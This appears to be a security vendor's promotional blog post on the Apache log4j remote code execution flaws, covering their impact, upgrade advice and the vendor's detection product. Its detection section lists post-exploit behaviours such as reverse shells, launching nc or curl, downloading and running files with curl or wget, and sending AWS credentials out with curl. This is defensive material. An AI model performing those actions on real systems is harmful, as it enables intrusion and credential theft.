The recently announced Apache log4j vulnerability has exposed businesses to a serious threat that is easy to exploit on a software component that is pervasively used in their environment. While security teams are busy trying to patch and upgrade their systems as quickly as possible, it is often easier said than done. Attackers in the meantime have stepped up scanning and exploitation activities to create an initial foothold from which they can extend their campaigns to cause major impacts such as data breaches, ransoms, and service disruptions. Here we describe the impacts of this dangerous vulnerability and the key areas of attention for organizations to secure their assets in this escalating threat landscape.
Summary of the Apache Log4j Vulnerability
Apache disclosed a vulnerability, CVE-2021-44228 and CVE-2021-45046, in the log4j library affecting Apache Log4j versions 2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0. This remote code execution (RCE) vulnerability has a critical severity with a CVSS score of 10. It is easy to exploit the vulnerability by sending a specially crafted request to the vulnerable application which allows an attacker to carry out remote code execution on the vulnerable system. It is recommended that organizations upgrade to the latest Apache Log4j version 2.17.0 which addresses CVE-2021-44228 (December 10, 2021), CVE-2021-45046 (December 14, 2021), and the recent CVE-2021-45105 (December 18, 2021).
The vulnerability involves an attacker sending a Java Naming and Directory Interface (JNDI) lookup message such as in a request to the vulnerable system. When the log4j component of the Java application processes this request, it would trigger a message lookup, remote Java class code load and execution of the associated content if message lookup substitution was enabled. This successful exploitation can allow a remote, unauthenticated attacker to take full control of a vulnerable target system.
Dangers of Log4j
Some characteristics of the Apache log4j exploit and their impact include:
a. Easy to trigger with a simple user crafted message that is logged by a java application
b. Large exposure as Apache log4j is an extremely common logging component for many Java applications
c. Hard to find as its common usage means an application’s many dependent components might be using it as well. Experts are expecting that it will be many months before businesses can comprehensively patch for this vulnerability.
d. Initially a zero-day vulnerability that led to security teams scrambling to patch their systems.Attackers have also been scanning for this vulnerability round the clock to create a foothold.
e. Post-exploit impact is yet to be seen. In many cases, attackers might have focused on creating a foothold which can lead to the continuation of the attack to crown jewels over the next several weeks culminating in a major impact.
Advice for next steps
In addition to quickly implementing preventative upgrade of their environment, organizations must:
Confluera CxDR addresses these critical needs with our enhanced log4j specific threat detections and unique real-time threat storyboarding technology that can identify signs of any post-exploit presence of the attacker. Ideally with the aid of solutions such as Confluera CxDR, organizations are enabled to focus on the following steps:
● Enhance detection controls to identify log4j exploitation.
Anomalous and unexpected system-level behaviors of running java applications are strong indications of a possible exploit of the log4j vulnerability. Following behaviors are often performed after successful exploitation of a java application by remote code execution and we are rolling out enhanced rules to detect them.
a. starting a shell
b. suspicious launch of network utilities such as nc, nmap, netstat, curl, wget.
c. reverse shell established
d. connecting outbound using ldap/rmi/dns/iiop protocols,
e.invoking curl/wget commands to download and execute a file
f. invoking curl with aws credentials
Confluera CxDR detects all such suspicious log4j exploitation activities with out-of-box detection rules.
● Proactive Threat Hunting to check for signs of compromise
As organizations look to deploy new processes and rules, they must be cognizant of the fact that some of the malicious actions could have already taken place. Organizations must leverage any audit and event monitoring tools deployed to proactively search for suspicious log4j exploit activity over the past weeks (or as far back as the event retention interval permits) to ensure that they have not been already compromised.
Confluera CxDR includes the ability to search the data collected already over the past months and check if these behaviors have manifested in the customer environments and led to anything malicious.
● Enhance monitoring of post-exploit attack steps and mitigate before damage.
As noted earlier, this easy to trigger zero-day vulnerability with a large attack surface has produced a significant window of opportunity for the attackers to create initial footholds from where they can launch stealthy attack campaigns over the next weeks and months. MITRE ATT&CK describes this attack lifecycle in an industry standard framework of multiple tactics, techniques & procedures including post-exploit steps that eventually impact the crown jewels.
Organizations not only need to bolster their preventative capabilities to block these exploits from happening but must also adopt an assume-breach mindset to incorporate capabilities that can identify the entire attack lifecycle in case there is a successful exploit.
Confluera CxDR has leveraged MITRE ATTC&K as the de-facto security framework and our security team works closely to contribute back our research to MITRE ATT&CK® v10. Confluera’s real-time threat storyboarding is purpose-built with out-of-the-box detection of these TTPs and accurate stitching of post-exploit steps to uncover the overall attack lifecycle.
Given the escalated threat exposure, Confluera’s security team is leveraging the real-time threat storyboarding capability to increase the proactive monitoring of all customer environments for such suspicious activities and will communicate immediately if we find anything unusual.
Upgrade systems/applications
Organizations need to make sure they are able to find all instances of the vulnerable software component and incorporate operationally efficient ways to deploy the upgrades. Here are a few recommended practices,
● Review applications that directly or indirectly use log4j here. There are several custom java applications for which use of log4j can only be found by scanning the jar files. We recommend use of open source scanning tools mentioned in CISE analysis.
● Most critical step should be to upgrade log4j instances to the latest version(currently at 2.17.0). In case that is a challenge, we can provide more information about using other methods such as disabling the JNDI lookup on the java process command line, using environment variable setting, and JNDI class removal.
● For more information on the log4j exploit and how to remediate it, refer to the CISA vulnerability guidance page.
Conclusion
As organizations get a grip of this major zero-day vulnerability, we are again reminded of how hard it can be to prevent attackers from getting in and how massive the potential impact can be. Confluera CxDR is purpose-built with the assumed breach mindset to not only detect an exploit but also deliver the ability to accurately storyboard post-exploit attack steps to quickly identify and mitigate the threats if an attacker sneaks in. Organizations are encouraged to adopt this mindset and equip themselves with capabilities that will keep their businesses secure in the presence of such major incidents that are regularly happening today.